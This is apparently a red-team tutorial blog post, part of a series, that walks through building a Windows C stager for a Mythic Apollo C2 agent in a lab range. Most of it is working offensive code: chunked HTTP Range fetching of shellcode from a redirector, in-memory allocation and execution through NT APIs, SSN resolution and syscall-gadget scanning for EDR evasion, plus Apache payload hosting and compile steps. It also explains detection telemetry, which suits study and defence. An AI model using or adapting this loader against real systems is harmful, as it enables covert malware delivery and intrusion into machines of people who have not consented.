Writing a Stager

Part three. We have a range, we have Mythic, we have an Apollo agent, we have coffee, and a willingness to read technical posts. Now we need something to actually get that agent onto a target box.

Enter the humble stager. Before we start slinging C code around, though, let's make sure we are calling it the right thing, because the terms stager and loader get used interchangeably everywhere and that causes real confusion.

A loader has the payload baked in, shellcode embedded at compile time, maybe encrypted, maybe XOR'd with a key, but it is in the binary. The loader's entire job is local, getting those bytes from inside itself into executable memory without getting caught, and no network is required.

A stager fetches the payload at runtime. It is a smaller binary that reaches out to infrastructure, pulls the real shellcode down, loads it into memory, and executes it. The shellcode never touches disk.

What we are building is a stager. It reaches out to the redirector, pulls Apollo shellcode in chunks, loads it, and runs it. That distinction matters because the two have different detection surfaces. A stager has a network fetch that a loader does not, which is an extra event source. But it also means you can rotate the payload on the server without recompiling anything. Burn the current shellcode, generate a new one, drop it in place, done. With a loader you are back to the compiler. There is a tradeoff in both directions and knowing which one you are working with helps you reason about the risks.

EDR and AV vendors use the word "stager" pretty consistently to describe binaries that fetch additional stages at runtime. If yours gets flagged, that is probably what the alert label says. Now you know why.

â„šī¸ Note

Batteries not included, same as before. You will understand what every piece does and why it is there, but if you drop this straight into a real engagement you will get caught. That is the point. Build the understanding first.


Before You Start: Snapshot

You should have a mythic-ready snapshot from the last post. Revert to it before touching anything in the range. The Apache edits we make here modify the redirector config and you want a clean baseline to go back to.

ludus range snapshot revert --name mythic-ready

If you have done work since then and want to keep it, snapshot first:

ludus range snapshot create --name pre-stager

Then revert. Get into the habit. A five second snapshot command has saved me from rebuilding the range more times than I want to admit.


Two Redirectors, Not One

The range has one redirector right now. Apache on VLAN 100 proxies matching URI paths back to Kali. The rules from part two forward /l33t and /g3t to Mythic.

We need a second function on that same box: serving the Apollo shellcode for the stager to pull down. We are using the same Apache instance because this is a lab and overcomplicating it does not help you learn. But we are going to treat it like a separate service with its own subdomain, and I want to explain why that separation matters before we configure anything.

On a real engagement, your C2 channel and your shellcode delivery should never share the same redirector. Here is what happens if they do. The shellcode fetch is a one-time event, bursty, and comparatively large. The C2 channel is low-volume beaconing every 60 seconds with jitter. If a defender is watching HTTP flows and they see a 300KB blob fetched from the same host that is generating your beacon traffic, you just correlated your stager to your agent. That is not a lead they will ignore. They can now work backwards: what delivered the stager, what does the beacon pattern look like, is this host in any other logs. You handed them the thread that unravels the whole chain.

Separate redirectors keep those two activities from looking related. The shellcode server can be burned without touching the C2 channel, the C2 redirector never serves a large blob, and the two traffic profiles on two different hosts have no obvious link between them.

In the range we approximate this with stager.redir.ludus as a virtual host on the same Apache box. The wildcard DNS rewrite *.redir.ludus that Ludus registered in part two means this subdomain resolves automatically, no additional config needed on the DNS side. In production you put these on separate infrastructure with separate providers and separate certificates. The concept is the same either way.


Setting Up the Shellcode Server

SSH into the redirector:

ssh [email protected]

Create the Apache virtual host config:

sudo nano /etc/apache2/sites-available/stager.conf

Add the following contents:

<VirtualHost *:80>
    ServerName stager.redir.ludus

    DocumentRoot /var/www/stager

    <Directory /var/www/stager>
        Options -Indexes
        AllowOverride None
        Require all granted
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/stager_error.log
    CustomLog ${APACHE_LOG_DIR}/stager_access.log combined
</VirtualHost>

Enable it and create the directory:

sudo a2ensite stager.conf
sudo mkdir -p /var/www/stager
sudo systemctl reload apache2

Now go generate the Apollo shellcode in Mythic, Payloads then Generate New Payload:

  • OS: Windows
  • Agent: Apollo
  • C2 Profile: http
  • Output format: shellcode

Callback host c2.redir.ludus, URI /l33t, 60s interval, 20% jitter. Click Create, download the file, and drop it on the redirector:

scp apollo.bin [email protected]:/var/www/stager/a.bin

Verify it is reachable:

curl -s http://stager.redir.ludus/a.bin | wc -c

You should get the byte count back. Zero or an error means the Apache config is wrong or the file landed in the wrong place.


What PIC Actually Means

When Mythic generates shellcode output instead of an exe, it produces position-independent code. That word "position-independent" is doing a lot of work so let us break it down.

A regular Windows executable has a preferred base address baked into the PE header. When the OS loads it, the loader maps the binary's sections to specific virtual addresses and fixes up any absolute references. The exe also has an import address table that the loader has to populate before execution starts, resolving which functions from which DLLs live at which addresses at runtime.

PIC has none of that: no preferred base address, no import table, no absolute references that assume anything about where the code will land. Everything it needs it finds at runtime by walking the Process Environment Block (PEB) and crawling the loaded module list to locate functions by hash. You can write it to any region of memory and call into it.

That is what makes it injectable. You allocate memory somewhere, copy the shellcode bytes in, and transfer execution to it. The shellcode handles the rest.

Apollo's shellcode output is a reflective loader wrapping the agent. When you execute it, the first thing it does is set itself up in memory by mapping its own PE sections, resolving its own imports, and jumping to the agent entry point. From the OS's perspective, by the time Apollo is running it looks like a DLL that loaded itself, no file on disk and no entry in the normal module list unless something goes looking for anomalous private memory regions.


Fetching in Chunks

The naive version of a stager does one HTTP GET, reads the entire shellcode file into a buffer, and writes it to memory. That works. It also looks exactly like what it is.

Network monitoring tools and flow analyzers watch for large single-response fetches from processes that have no business making network requests. A 300KB response to the very first outbound connection a freshly-executed binary makes is a pattern with a name in most detection rulesets. You are not being subtle.

Chunked delivery breaks that single request into a series of smaller ones using HTTP Range headers. Each request asks for a slice of the file, bytes 0 through N, then N+1 through 2N, and so on until you have assembled the whole thing in memory. Each individual request looks small. The traffic pattern looks more like a software update client or an MDM agent polling for patch data than a payload fetch.

There are two other benefits worth understanding. First, YARA rules and network signatures that scan for shellcode patterns in HTTP responses are looking at the content of individual responses. If you chunk small enough, no single response contains enough of the payload to match. Reassembly happens inside the stager, not on the wire. Second, the chunk size is something you should be able to tune per engagement. If the target environment runs an MDM that pulls updates in 64KB chunks, your stager should look like that. If the environment is noisier and large requests are common, you can push the chunk size up. The point is to look like traffic that already belongs there.

In this stager we use HTTP Range headers to implement chunking. Apache supports range requests by default so no server-side changes are needed. We request Range: bytes=0-8191, get the first 8KB, then Range: bytes=8192-16383, and keep going until a response comes back shorter than the requested chunk size, which tells us we hit the end of the file.

CHUNK_SIZE is a #define at the top of the code. Change it before you compile. 8192 is a conservative starting point that matches a lot of common software patterns.


Syscalls, SSNs, and Why This All Matters

Every interaction your code has with the Windows kernel goes through a syscall. VirtualAlloc, CreateThread, reading a file, opening a process handle, all of it eventually becomes a transition from user mode to kernel mode via the syscall instruction. Windows handles this transition through ntdll.dll, which exports a set of functions with the Nt and Zw prefixes. NtAllocateVirtualMemory, NtCreateThreadEx, and so on. If the user mode / kernel mode boundary is new to you, BowTiedCrawfish has a solid intro with diagrams worth reading before going further.

Each of those functions corresponds to a kernel routine, and the way the kernel knows which routine you are requesting is a number baked into the function stub. That number is the System Service Number, or SSN. The stub for NtAllocateVirtualMemory in ntdll looks like this:

mov r10, rcx          ; required by syscall ABI
mov eax, 0x18         ; SSN for NtAllocateVirtualMemory (Windows 11 22H2)
syscall               ; transition to kernel
ret

The 0x18 is the SSN. The kernel reads it out of eax on arrival and routes the call to the right handler. Different Windows versions assign different SSNs to the same functions. NtAllocateVirtualMemory is 0x18 on one build and something else on another. Hardcoding these numbers is how you write stagers that crash on the wrong OS version. The correct approach is to read the SSN out of the ntdll stub at runtime by parsing the export table.

Now here is where EDRs enter the picture.

Modern endpoint products hook those ntdll stubs. They patch the first few bytes of functions like NtAllocateVirtualMemory and NtCreateThreadEx so that before the actual syscall executes, control passes through the EDR's inspection code. The EDR looks at the call context, decides if it is suspicious, and either allows it or blocks it. This is userland hooking, and it is the primary mechanism most endpoint products use to see what your code is doing.

The first counter that went mainstream was direct syscalls. Instead of calling ntdll's potentially-hooked stub, you put your own mov eax, <SSN> and syscall instruction directly in your code, bypassing the hook entirely because you never go through the hooked stub. This worked until EDRs and ETW adapted: when a syscall instruction fires from an address that is not inside ntdll's address range, that is anomalous, telemetry fires, and the Microsoft-Windows-Threat-Intelligence ETW provider logs it with everything up the stack seeing it.

"Will the real SSN please stand up?"

Direct syscalls are spotted with relative ease, so now we have indirect syscalls. Instead of emitting your own syscall, you locate a legitimate syscall; ret gadget inside ntdll's .text section and jump into it. Your code sets up the arguments and loads the SSN into eax, then transfers control to that gadget address, so the syscall instruction fires from inside ntdll's legitimate address range. From ETW's perspective it came from ntdll, and that is the whole trick.

; Direct syscall - instruction fires from your code (flagged)
mov r10, rcx
mov eax, 0x18
syscall               ; <-- your address range

; Indirect syscall - instruction fires from ntdll (looks clean)
mov r10, rcx
mov eax, 0x18
jmp <ntdll gadget>    ; jumps into ntdll, syscall fires there

The tradeoff is that you need to find the SSN for each function at runtime and locate a syscall; ret gadget inside ntdll at runtime. Neither is hard, we will write both functions below. But it is more moving parts than just calling VirtualAlloc.

Two resources worth bookmarking if you want to go deeper on the NT layer:

  • j00ru's Windows Syscall Table - a full table of SSNs across every Windows version, invaluable for understanding how they shift between builds
  • ntinternals.net - documentation for undocumented NT functions, including argument lists for things like NtCreateThreadEx that do not appear in the official SDK

One important thing to understand before we move on: indirect syscalls get you past the hooked function prologue, but they do not get you past ETW kernel events. The Microsoft-Windows-Threat-Intelligence provider fires telemetry when memory is allocated with execute permissions, when that memory is written to, and when a thread is created pointing into it, and these events fire in the kernel regardless of how you made the syscall. The syscall technique is about bypassing the userland hook. ETW is a separate detection layer and the two require separate thinking.


The Stager

Time to get in that state of mind that makes your fingers do the coding thing. We are writing this in C and walking through it section by section.

Finding the SSN at Runtime

The SSN for any NT function lives inside its ntdll stub at a fixed offset. The stub always starts with mov r10, rcx (3 bytes) followed by mov eax, <SSN> (5 bytes, with the SSN as a 4-byte immediate starting at byte 4). We read it out by parsing the export directory.

#include <windows.h>
#include <winternl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <wininet.h>

#pragma comment(lib, "wininet.lib")

#define CHUNK_SIZE 8192

typedef NTSTATUS (NTAPI *NtAllocateVirtualMemory_t)(
    HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
typedef NTSTATUS (NTAPI *NtWriteVirtualMemory_t)(
    HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
typedef NTSTATUS (NTAPI *NtProtectVirtualMemory_t)(
    HANDLE, PVOID*, PSIZE_T, ULONG, PULONG);
typedef NTSTATUS (NTAPI *NtCreateThreadEx_t)(
    PHANDLE, ACCESS_MASK, PVOID, HANDLE, PVOID, PVOID,
    ULONG, SIZE_T, SIZE_T, SIZE_T, PVOID);
typedef NTSTATUS (NTAPI *NtWaitForSingleObject_t)(
    HANDLE, BOOLEAN, PLARGE_INTEGER);

DWORD get_syscall_number(const char* func_name) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return 0;

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ntdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE*)ntdll + dos->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)(
        (BYTE*)ntdll + nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    DWORD* names    = (DWORD*)((BYTE*)ntdll + exports->AddressOfNames);
    WORD*  ordinals = (WORD*) ((BYTE*)ntdll + exports->AddressOfNameOrdinals);
    DWORD* funcs    = (DWORD*)((BYTE*)ntdll + exports->AddressOfFunctions);

    for (DWORD i = 0; i < exports->NumberOfNames; i++) {
        const char* name = (const char*)((BYTE*)ntdll + names[i]);
        if (strcmp(name, func_name) == 0) {
            BYTE* func = (BYTE*)ntdll + funcs[ordinals[i]];
            return *(DWORD*)(func + 4);
        }
    }
    return 0;
}

We walk the export directory, find the function by name, and read four bytes starting at offset 4 inside the stub. That is the SSN. This assumes the EDR has not replaced those bytes with hook trampoline code, which they generally do not since they hook the prologue not the SSN encoding itself.

There is a catch though. Some EDRs fully stomp the stub, in which case offset 4 gives you bytes from the trampoline, not the real SSN. Hell's Gate is where the public technique started, and Halo's Gate added the fix: walk neighboring exports instead. NT syscall numbers are assigned sequentially in alphabetical function order, so if your target is hooked but its neighbors are clean you can calculate the SSN from the surrounding ones. Tartarus' Gate and RecycledGate are the more current implementations of this and handle a wider range of hook styles.

The cleaner approach that sidesteps the problem entirely is mapping a fresh copy of ntdll from disk yourself. Open C:\Windows\System32\ntdll.dll with CreateFile and CreateFileMapping, read the SSN out of the on-disk bytes before any EDR has touched them, no neighbor-walking, no assumptions about what the hook trampoline looks like. This is where most serious implementations have landed.

Locating the Gadget

Next we need to find a syscall; ret sequence inside ntdll's .text section to use as our jump target.

void* find_syscall_gadget(void) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return NULL;

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ntdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE*)ntdll + dos->e_lfanew);
    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, section++) {
        if (memcmp(section->Name, ".text", 5) == 0) {
            BYTE* base = (BYTE*)ntdll + section->VirtualAddress;
            DWORD size = section->Misc.VirtualSize;
            for (DWORD j = 0; j < size - 2; j++) {
                // 0f 05 = syscall, c3 = ret
                if (base[j] == 0x0f && base[j+1] == 0x05 && base[j+2] == 0xc3) {
                    return (void*)(base + j);
                }
            }
        }
    }
    return NULL;
}

We scan for 0x0f 0x05 0xc3, that is syscall; ret. Jump here with the SSN in eax and arguments in the right registers, and the syscall instruction fires from inside ntdll's address range. That is the point.

Same caveat as SSN resolution: sourcing the gadget from in-memory ntdll means scanning a potentially-modified image. A hardened implementation sources it from the fresh-mapped on-disk copy instead.

Where the Syscall Evasion Landscape Actually Is

A correct indirect syscall trampoline requires per-function assembly stubs. Each one loads the SSN into eax, handles Windows x64 calling convention correctly including stack argument spilling for functions with more than four parameters, then jumps to the gadget. NtCreateThreadEx takes eleven arguments. Getting the calling convention wrong means an immediate crash, not subtly wrong behavior.

This is 2026 and SysWhispers3 is signatured. The generated stub patterns, the ASM file layout, the naming conventions are all well-known to defenders, and static analysis will catch a SysWhispers3 binary on a mature endpoint before it runs. It is still useful for understanding what correct stubs look like and how the calling convention works, but not something you reach for operationally.

Where serious implementations have landed is layered, and each layer is addressing a different detection signal, not the same one repeatedly. Indirect syscalls get you past userland hooks. Everything visible after that requires something else. The later posts in this series cover those layers one at a time.

For this stager we call the NT functions through GetProcAddress, going through ntdll and any EDR hooks normally. The code demonstrates the right memory flow and will get you a callback in the lab. When you want to go further, resolve SSNs from a fresh-mapped ntdll, write per-function stubs that do not match public tooling, and swap the GetProcAddress calls. The rest of the stager does not change.

Fetching the Shellcode

BYTE* fetch_shellcode(const char* host, const char* path, SIZE_T* out_size) {
    HINTERNET session = InternetOpenA(
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!session) return NULL;

    HINTERNET conn = InternetConnectA(
        session, host, 80, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (!conn) { InternetCloseHandle(session); return NULL; }

    SIZE_T total_size = 0;
    SIZE_T buf_size   = 1024 * 1024;
    BYTE*  buf        = (BYTE*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, buf_size);
    if (!buf) { InternetCloseHandle(conn); InternetCloseHandle(session); return NULL; }

    DWORD offset = 0;

    while (1) {
        char range_header[64];
        snprintf(range_header, sizeof(range_header),
            "Range: bytes=%lu-%lu", offset, offset + CHUNK_SIZE - 1);

        HINTERNET req = HttpOpenRequestA(
            conn, "GET", path, NULL, NULL, NULL,
            INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_RELOAD, 0);
        if (!req) break;

        HttpAddRequestHeadersA(req, range_header, (DWORD)-1,
            HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE);

        if (!HttpSendRequestA(req, NULL, 0, NULL, 0)) {
            InternetCloseHandle(req);
            break;
        }

        DWORD status = 0;
        DWORD status_len = sizeof(status);
        HttpQueryInfoA(req, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
            &status, &status_len, NULL);

        // 206 = partial content, 200 = server ignored range and returned everything
        if (status != 206 && status != 200) {
            InternetCloseHandle(req);
            break;
        }

        BYTE  chunk[CHUNK_SIZE];
        DWORD bytes_read  = 0;
        DWORD chunk_total = 0;

        while (InternetReadFile(req, chunk + chunk_total,
               CHUNK_SIZE - chunk_total, &bytes_read) && bytes_read > 0) {
            chunk_total += bytes_read;
        }

        InternetCloseHandle(req);
        if (chunk_total == 0) break;

        if (total_size + chunk_total > buf_size) {
            buf_size *= 2;
            BYTE* new_buf = (BYTE*)HeapReAlloc(
                GetProcessHeap(), HEAP_ZERO_MEMORY, buf, buf_size);
            if (!new_buf) break;
            buf = new_buf;
        }

        memcpy(buf + total_size, chunk, chunk_total);
        total_size += chunk_total;
        offset     += chunk_total;

        if (chunk_total < CHUNK_SIZE) break;
    }

    InternetCloseHandle(conn);
    InternetCloseHandle(session);

    *out_size = total_size;
    return buf;
}

A few things here. The User-Agent is a Chrome-style string, but on a real engagement pick something that matches what the target environment actually generates. A domain-joined corporate machine running Chrome 24 hours a day generates Chrome User-Agent strings, so your stager should look like one of those requests, not like a blank WinHTTP client.

The loop breaks when a response comes back shorter than CHUNK_SIZE, which is the end-of-file signal. Apache sends 206 Partial Content for every chunk until the last one, which either returns a shorter response or a 416 Range Not Satisfiable if we asked for bytes past the end, and both cases mean we are done.

CreateThread vs NtCreateThreadEx

Before we look at the execution code, this distinction is worth understanding because it shows up in what defenders actually see.

CreateThread is the documented Win32 API that goes through kernel32.dll, which calls down into ntdll, which calls NtCreateThreadEx. Every layer of that chain is a place an EDR can hook, and it means your shellcode address gets passed as a function pointer to a publicly documented API that is logged.

NtCreateThreadEx is the NT layer function directly. Using it skips the kernel32 wrapper and gives you more control over thread creation flags, including SkipDllNotify which suppresses DLL load notifications when the thread starts, one less event source for EDRs that monitor those callbacks.

The call stack difference is visible and meaningful. With CreateThread, Process Explorer and WinDbg show the shellcode thread like this:

stager.exe!<shellcode region>         <- no symbol, unbacked memory
kernel32.dll!BaseThreadInitThunk
ntdll.dll!RtlUserThreadStart

With NtCreateThreadEx:

stager.exe!<shellcode region>         <- still unbacked
ntdll.dll!RtlUserThreadStart

You lose the kernel32 frame, but the fundamental problem is the same either way: the thread starts in memory with no module name, no symbol, and no PE header backing it. That pattern is called an unbacked thread start address and it is one of the first things analysts look for when triaging a suspicious process.

The second place the call stack tells on you is at the syscall boundary. A legitimate call to NtAllocateVirtualMemory from normal software unwinds like this:

ntdll.dll!NtAllocateVirtualMemory    <- syscall fires here
ntdll.dll!RtlAllocateHeap
ucrtbase.dll!malloc
someapp.exe!SomeFunction

Every frame maps back to a module on disk and the call makes sense going upward. With indirect syscalls you jump into the middle of an ntdll stub, so there is nothing recognizable between ntdll and your code:

ntdll.dll!NtAllocateVirtualMemory+0x9   <- jumped into the middle of the stub
stager.exe!<your code>                  <- jmp came from here, nothing between

No RtlAllocateHeap, no malloc, no coherent reason for your binary to be sitting directly below an ntdll syscall stub. EDRs with call stack unwinding know this pattern and the gap is the tell.

Viewing it yourself

Run Process Explorer as administrator on the workstation before executing the stager. Once you get a Mythic callback, find the stager process in the list, double-click it, and go to the Threads tab. The shellcode thread will have a start address that shows as a raw hex offset with no module name, something like 0x1a3bc0000. Click it, then click Stack.

In the Start Address column, legitimate threads show something like ntdll.dll!TppWorkerThread. The shellcode thread shows a raw address or <unknown>, that is the unbacked start.

You can also attach WinDbg, list threads with ~, switch to the shellcode thread with ~Ns, and run k for the call stack:

0:001> k
 # Child-SP          RetAddr               Call Site
00 000000b2`1a3ff8d0 00007ff8`c1a2e3a1     ntdll!NtWaitForSingleObject+0x14
01 000000b2`1a3ff8d8 00000001`a3bc0042     ntdll!RtlUserThreadStart+0x21
02 000000b2`1a3ff918 00000000`00000000     0x1a3bc0042

Frame 02 is your shellcode with no module, frame 01 is RtlUserThreadStart handing control into it, and frame 00 is wherever the shellcode is currently parked waiting on a handle.

Compare that to a legitimate thread:

00 ...  ntdll!NtWaitForSingleObject+0x14
01 ...  ntdll!TppWorkerThread+0x3b6
02 ...  ntdll!RtlUserThreadStart+0x21

Same ntdll functions, but TppWorkerThread is a real named thread pool function and the whole stack is module-backed. An analyst scanning threads dismisses that one immediately and clicks into yours.

Allocation, Write, Execute

int main(void) {
    SIZE_T sc_size = 0;
    BYTE* shellcode = fetch_shellcode("stager.redir.ludus", "/a.bin", &sc_size);
    if (!shellcode || sc_size == 0) return 1;

    PVOID  region      = NULL;
    SIZE_T region_size = sc_size;
    HANDLE self        = (HANDLE)-1; // NtCurrentProcess pseudo-handle

    // Allocate RW - not RWX, we flip permissions after writing
    NtAllocateVirtualMemory_t NtAlloc = (NtAllocateVirtualMemory_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");

    NTSTATUS status = NtAlloc(
        self, &region, 0, &region_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE);

    if (status != 0) { HeapFree(GetProcessHeap(), 0, shellcode); return 1; }

    NtWriteVirtualMemory_t NtWrite = (NtWriteVirtualMemory_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory");

    SIZE_T written = 0;
    NtWrite(self, region, shellcode, sc_size, &written);
    HeapFree(GetProcessHeap(), 0, shellcode);

    // Flip to RX - writable phase is done
    NtProtectVirtualMemory_t NtProtect = (NtProtectVirtualMemory_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");

    ULONG old_protect = 0;
    NtProtect(self, &region, &region_size, PAGE_EXECUTE_READ, &old_protect);

    NtCreateThreadEx_t NtThread = (NtCreateThreadEx_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");

    HANDLE thread = NULL;
    NtThread(
        &thread,
        THREAD_ALL_ACCESS,
        NULL,
        self,
        region,
        NULL,
        0,
        0, 0, 0,
        NULL);

    NtWaitForSingleObject_t NtWait = (NtWaitForSingleObject_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWaitForSingleObject");

    NtWait(thread, FALSE, NULL);
    CloseHandle(thread);
    return 0;
}

The memory permission sequence matters. We allocate PAGE_READWRITE, write the shellcode in, then flip to PAGE_EXECUTE_READ before creating the thread, and we never hold PAGE_EXECUTE_READWRITE. RWX is one of the most reliably flagged permission combinations in modern endpoint products because it literally says "I have memory I can write to and execute," and legitimate software does not do that. Splitting write and execute into two separate permission states is the right pattern regardless of everything else we are doing here.

The GetProcAddress calls resolve through ntdll directly, meaning through any EDR hooks present. To plug in SysWhispers3-generated stubs, swap each GetProcAddress block for the generated function of the same name and the rest of the code stays the same.


Building It

On Kali, cross-compile with MinGW:

x86_64-w64-mingw32-gcc stager.c -o stager.exe \
    -lwininet \
    -mwindows \
    -O2 \
    -s

-mwindows kills the console window, -s strips symbols, and -O2 lets the compiler optimize which also mildly complicates static analysis as a side effect.

Copy stager.exe to the workstation and run it. Watch for the callback in Mythic.

If nothing shows up, check a few things. Can the workstation reach stager.redir.ludus? Test with curl http://stager.redir.ludus/a.bin from the workstation. Does the shellcode architecture match the stager? x64 Apollo shellcode will not run in a 32-bit process. Does the Mythic HTTP profile match the callback URL and URI path? Also check the Apache log on the redirector for the chunk requests:

sudo tail -f /var/log/apache2/stager_access.log

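You should see a series of GETs to /a.bin, each returning 206, which means the stager is working. The combined log format does not record the Range header itself, so look at the status code and the per-request byte count, which should match CHUNK_SIZE for every request except possibly the last.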


What the Defender Sees

The chunk requests hit the network as a series of small HTTP GETs with Range headers. How much that helps depends on what the environment inspects. Flow analysis sees small requests and moves on. Per-response content inspection never sees the full shellcode in a single response.

In memory, four NT calls happen in sequence: allocate a region, write to it, flip permissions, create a thread. All four fire ETW telemetry through Microsoft-Windows-Threat-Intelligence regardless of how the syscall was made. The sequence of allocate-write-protect-thread into the same region is a known pattern with a name in most detection rulesets, and your stager binary is identified by that sequence.

What indirect syscalls buy you is bypassing the userland hooks in ntdll. If the EDR blocks based on hooks you get around that. If it logs based on ETW the log fires anyway, and most mature products use both layers.

The unbacked thread start address is visible to any analyst who looks at the process. Process Explorer shows it, WinDbg shows it, and the shallow call stack with no coherent origin is a tell that does not require any special tooling to see.

This stager will get caught by a tuned EDR and a curious analyst. The goal is to understand what each piece does, why the detection fires where it does, and what you would need to change to address each layer specifically. Process injection into a host process, call stack spoofing, ETW patching, those are the next layers and they are coming in later posts.


What Comes Next

  • Injection techniques, running the shellcode inside another process instead of the stager itself and why that changes the detection story
  • C2 profiles, shaping what Mythic's traffic actually looks like on the wire
  • EDR evasion, call stack spoofing, ETW patching, and where those approaches start breaking down
  • DNS C2, operating when HTTP is monitored or blocked

Each post adds a layer. By the end the chain is complete.